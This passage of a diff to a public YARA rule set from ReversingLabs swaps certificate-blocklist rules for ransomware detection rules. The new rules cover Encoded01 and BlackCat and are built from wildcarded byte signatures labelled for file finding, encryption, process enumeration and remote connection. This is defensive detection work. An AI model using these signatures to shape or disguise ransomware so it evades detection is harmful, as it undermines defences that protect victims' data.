+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" and 1600069289 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ee678930D5Bdfaa2Ab0172Fa4C10Ae07 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Encoded01 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Encoded01 ransomware."
 		author = "ReversingLabs"
-		id = "e2c2c34a-6177-5457-9ed9-fa34f82ee4cd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "923d987e-f888-5b6a-9ebd-ee1257124aed"
+		date = "2021-12-16"
+		modified = "2021-12-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5346-L5364"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1e254450fdbe94172a4fa2d2727c3ade5ae436cf4c0c1153a15e9a2f64f2452"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Encoded01.yara#L1-L141"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f6f872290f15f4c564911bb099824c47cb13164457e1bcdb02dee441bc2d6b6a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Encoded01"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 89 4D ?? 89 55
+            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 55 ?? 66 83 7C 42 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ??
+            ?? ?? ?? 8B 7D ?? 4F 85 FF 0F 8C ?? ?? ?? ?? 47 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ??
+            ?? ?? ?? 8B 45 ?? 8B 55 ?? FF 34 90 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ??
+            33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D
+            95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ??
+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
+            8B 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84
+        }
+		$find_files_p2 = {
+            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 6A ?? 68 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 8B 00 E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 3B 55 ?? 75 ?? 3B 45 ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 83 7D ?? ??
+            75 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 73 ??
+            8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 0F 84 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ??
+            ?? 33 D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 74
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? ?? ??
+            ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 33
+            D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? EB ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8A 45 ?? 50 8A 45 ?? 50 FF 75 ?? 68 ?? ??
+            ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
+            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0
+            40 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 4F
+        }
+		$enum_resources = {
+            55 8B EC 83 C4 ?? 53 56 57 8B F9 89 55 ?? 8B F0 8B 5D ?? C6 45 ?? ?? 33 C0 89 03 33
+            C0 89 07 8D 45 ?? 50 8B 45 ?? 50 6A ?? 56 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 03 83 3B ?? 74 ?? 83 3B ?? 74 ??
+            C7 07 ?? ?? ?? ?? 8B 03 33 C9 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 03 50 57 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 75 ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? EB
+            ?? BE ?? ?? ?? ?? EB ?? 81 FE ?? ?? ?? ?? 74 ?? 85 F6 0F 94 45 ?? 80 7D ?? ?? 75 ??
+            8B 03 E8 ?? ?? ?? ?? 33 C0 89 03 33 C0 89 07 8B 45 ?? 50 E8 ?? ?? ?? ?? 8A 45 ?? 5F
+            5E 5B 8B E5 5D C2
+        }
+		$remote_connection_p1 = {
+            BB ?? ?? ?? ?? 83 FB ?? 75 ?? 33 C0 89 45 ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 8B
+            C6 E8 ?? ?? ?? ?? 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 33 C0 89 45 ?? 8D 45 ??
+            50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 83 C0
+            ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? 8B 45 ?? 59 E8 ?? ?? ??
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ??
+            ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D 85 ?? ?? ?? ?? 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B D0 42 8B 45 ?? 59 E8
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 FF 0F
+            85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89
+            45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
+        }
+		$remote_connection_p2 = {
+            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74
+            ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A
+            58 76 ?? EB ?? 5A 58 7E ?? 8B 06 E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ??
+            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D
+            ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ??
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A
+            ?? 8B 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50
+            8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 76 ?? EB ?? 5A 58 7E ?? 8B 06
+            E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03
+            C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D
+            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8
+        }
+		$encrypt_files = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75
+            ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
+            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D
+            ?? ?? 74
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEX CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" or pe.signatures [ i ] . serial == "ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" ) and 1571011200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D7C432E8D4Edef515Bfb9D1C214Ff0F5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blackcat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackCat ransomware."
 		author = "ReversingLabs"
-		id = "5aed508e-2da1-52a0-98f3-52e903e95b7d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e623340d-8df8-5f13-b75f-379bd0038f64"
+		date = "2022-02-14"
+		modified = "2022-02-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5366-L5384"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "63741513f3ab2f51ecd66dc973239c9dc194b86504fe26b2dd4a7f31299e5497"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BlackCat.yara#L1-L109"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24932baa625aedd14b5776ba3209c9ee330e84538c5267eeb5e09e352f655835"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackCat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? A1 ??
+            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? A1 ?? ?? ?? ?? 0F 45 C1 8B 0D ?? ??
+            ?? ?? 0F 45 CA 8D 54 24 ?? 89 94 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 56 51 FF 50 ?? 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
+            FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75
+            ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85
+        }
+		$remote_connection_p2 = {
+            C0 89 44 24 ?? 0F 88 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 89 CB 85 C0
+            75 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 85 C0 89 D9 75 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ??
+            53 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 89 F1 8D 54 24 ?? 89 44 24 ?? 89 5C 24
+            ?? 89 5C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 84 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
+            ?? ?? ?? 3D ?? ?? ?? ?? 0F 43 C1 6A ?? 50 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89
+            44 24 ?? 75 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 ?? 6A ?? FF 35 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 0F 84 ?? ?? ?? ?? 80 BB ?? ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB
+        }
+		$enum_procs = {
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 39 F7 74 ??
+            69 C7 ?? ?? ?? ?? 89 4D ?? 01 C8 68 ?? ?? ?? ?? 89 DE 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            47 8D 85 ?? ?? ?? ?? 89 7D ?? 50 8B 5D ?? 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 89
+            F3 89 C6 EB ?? 8D 4D ?? 89 F2 E8 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? EB ?? 31 FF 8B 75 ??
+            85 FF 75 ?? E9 ?? ?? ?? ?? 31 FF 53 E8 ?? ?? ?? ?? 8B 75 ?? 85 FF 0F 84 ?? ?? ?? ??
+            83 7D ?? ?? 0F 84 ?? ?? ?? ?? 69 C7 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? 01 F0 89
+            45 ?? 8B 45 ?? 8D 04 40 8D 04 81 89 45 ?? EB
+        }
+		$find_files = {
+            57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 56 E8 ?? ?? ??
+            ?? 83 F8 ?? 89 45 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 0F
+            84 ?? ?? ?? ?? 89 C6 8B 45 ?? 8B 4D ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ??
+            8D 41 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 CB 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 45 ?? 89 43 ?? 89 73 ?? 8B 75 ?? 31 C0 C7 43 ?? ?? ?? ?? ?? F7 45
+            ?? ?? ?? ?? ?? 89 03 75 ?? 83 7D ?? ?? 74 ?? 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5E 5F 5B 5D C3
+        }
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? 8D 4D ?? 8D 95 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75
+            ?? 8D 4D ?? 89 FA 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 8B 5D ?? 89
+            45 ?? 8B 45 ?? 83 F8 ?? 72 ?? 85 DB 74 ?? 0F B7 0B 81 F9 ?? ?? ?? ?? 75 ?? 8B 4B ??
+            89 C2 29 CA 72 ?? 83 FA ?? 72 ?? 85 DB 74 ?? 81 3C 0B ?? ?? ?? ?? 75 ?? 0F B7 54 0B
+            ?? 81 FA ?? ?? ?? ?? 75 ?? 0F B7 54 0B ?? 83 EA ?? 89 55 ?? BA ?? ?? ?? ?? 19 D2 89
+            55 ?? 72 ?? 83 F9 ?? 76
+        }
+		$encrypt_files_p2 = {
+            53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 57
+            6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 51 ?? 29 D0 8B 55 ?? 0F 92
+            45 ?? 83 7D ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 39 C2 77 ?? B8 ?? ?? ?? ?? F7 64 0B ?? 8B
+            55 ?? 70 ?? 39 C2 72 ?? 8B 44 0B ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? 8B 85 ??
+            ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ??
+            89 45 ?? 89 10 89 48 ?? 8B 45 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 8B 4D ?? 29 45 ?? 3B 4D ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8B 45 ?? 8B 4D ?? 89 45 ?? 89 4D ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 8B 45 ?? F2 0F 10 45 ?? 85 F6 89 85 ?? ?? ?? ?? F2 0F 11 85 ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8D 0C C0 8D 3C 49 01 C7 01 F7 EB
+        }
+
 	condition:
